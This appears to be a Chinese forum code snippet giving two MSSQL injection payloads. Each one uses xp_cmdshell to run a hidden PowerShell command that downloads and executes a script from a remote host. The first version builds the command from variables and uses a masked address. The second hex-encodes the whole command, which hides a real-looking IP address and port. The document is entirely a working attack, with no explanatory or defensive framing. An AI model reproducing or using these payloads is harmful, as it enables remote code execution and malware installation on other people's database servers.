[Bash shell] 纯文本查看 复制代码 declare @a nvarchar(100)='powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(';
declare @b nvarchar(100)='http://xxx.xxx.xxx.xxx:2000/a';
declare @ab nvarchar(200)=concat(@a,0x27,@b,0x27,'))"');
exec master..xp_cmdshell @ab;--
另一种:
[Bash shell] 纯文本查看 复制代码 declare @a nvarchar(300) = concat(0x706f7765727368656c6c2e657865202d6e6f70202d772068696464656e202d6320224945582028286e65772d6f626a656374206e65742e776562636c69656e74292e646f776e6c6f6164737472696e672827687474703a2f2f3231312e3134392e3235352e3139363a323030302f6127292922,0x20);
exec master..xp_cmdshell @a;--
|